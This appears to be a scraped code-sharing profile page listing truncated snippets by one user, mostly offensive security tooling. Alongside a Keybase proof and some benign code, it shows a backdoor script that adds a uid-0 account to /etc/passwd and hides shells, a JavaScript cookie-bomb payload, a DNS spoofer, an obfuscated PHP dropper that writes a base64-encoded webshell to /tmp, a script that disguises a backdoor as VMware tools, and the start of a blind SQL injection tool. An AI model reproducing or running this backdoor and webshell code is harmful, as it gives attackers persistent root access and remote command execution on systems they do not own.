sbehrens

# TODO
# copy binarys to new location, execute from said location. ensure ps command filters out commands

#PORT="1337"


# Add users, cat ssh key for ssh key access, clear history, copy shells with sguid bit set to hidden files for later use
deluser news  > /dev/null 2>&1
deluser list > /dev/null 2>&1
sed '7ilist:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt

sbehrens

Keybase proof

I hereby claim:

• I am sbehrens on github.
• I am arbit (https://keybase.io/arbit) on keybase.
• I have a public key whose fingerprint is 3BCB 4364 EF4A 3F6A C890 A755 18B8 EFD6 D8EE 14EA

To claim this, I am signing this object:

sbehrens

(function(d){
	desired_length = 8192;
	for(cookie_val = '=';cookie_val.length<=97;cookie_val+="A"){};
	for(i=100;(desired_length-d.cookie.length)>111;i++,d.cookie=i+cookie_val){};
	for(cookie_val="999=";(cookie_val.length + d.cookie.length + 9) <= desired_length;cookie_val += "A"){};
	d.cookie = cookie_val;
	d.cookie = "888=8";
	x = new XMLHttpRequest();
	x.onreadystatechange = function(){
		if (x.readyState == 4 && x.status == 400){

sbehrens

import array
import base64
import copy

# Found X0R cipher on an app assessment?  Got the ciphertext and know the plaintext?  Use this to get the key.  

cipher_text = array.array('B', base64.b64decode("Some Blob of base64 encoded ciphertext remove decoder if not base64"))

plain_text = array.array('B', "some known plaintext value")

sbehrens

def decode_string(x, f):
    colon = x.index(':', f)
    try:
        n = int(x[f:colon])
    except (OverflowError, ValueError):
        n = long(x[f:colon])
    if x[f] == '0' and colon != f+1:
        raise ValueError
    colon += 1

sbehrens

CON
   
  _clkmode = xtal1 + pll16x
  _xinfreq = 5_000_000
  
  
VAR
  long foodude
  long datatown
  byte hello

sbehrens

# File:  fakedns.py
# Name:  Interactive CLI DNS Spoofer
# by:    @mastahyeti 
#
# based off of http://code.activestate.com/recipes/491264/

from __future__ import print_function
from gevent.event import Event
from gevent.pool import Pool
from gevent import socket

sbehrens

<?PHP

$b = 'bas'.'e64'.'_de'.'code';

file_put_contents('/tmp/asd', $b('P D 9 Q S F A K Z n V u Y 3 R p b 2 4 g b G x l a H M o J G N t Z C w g J G F y c m F 5 I D 0 g d H J 1 Z S l 7 C i A g I C B p Z i A o I W V t c H R 5 K C R j b W Q p K X s K I C A g I C A g I C B p Z i A o Y G V j a G 8 g Y W A p e y A k c 2 F s a W R h W 1 0 9 K G A k Y 2 1 k Y C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g Y C R j b W R g J z t 9 C i A g I C A g I C A g C i A g I C A g I C A g Z W x z Z W l m I C h z a G V s b H B v c G V u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X N o Z W x s c G 9 w Z W 4 o J G N t Z C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g c G 9 w Z W 4 o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H N o Z W x s X 2 V 4 Z W M o J 2 V j a G 8 g Y S c p K X s k c 2 F s a W R h W 1 0 9 c 2 h l b G x f Z X h l Y y g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B z a G V s b F 9 l e G V j K C R j b W Q p J z t 9 C i A g

sbehrens

# vmware backdoor if the dir don’t exist (which it should) create it anyway

mkdir -p /usr/lib/vmware-tools/bin32
vmwarestamp="`ls -l /usr/bin/lsof 2>log.error | awk {'print $6'}`"
echo $vmwarestamp
touch ./vmware-vnet1
chmod 755 ./vmware-vnet1

read -d '' vmware <<"BLOCK"
#!/bin/bash

sbehrens

##NOT FINISHED##
## ©mastahyeti 2011##
import urllib2
import urllib
import time
import math

CHARSET = [chr(x) for x in xrange(32,39)] + [chr(x) for x in xrange(40,127)] #everything but '
CHARSET_LEN = len(CHARSET)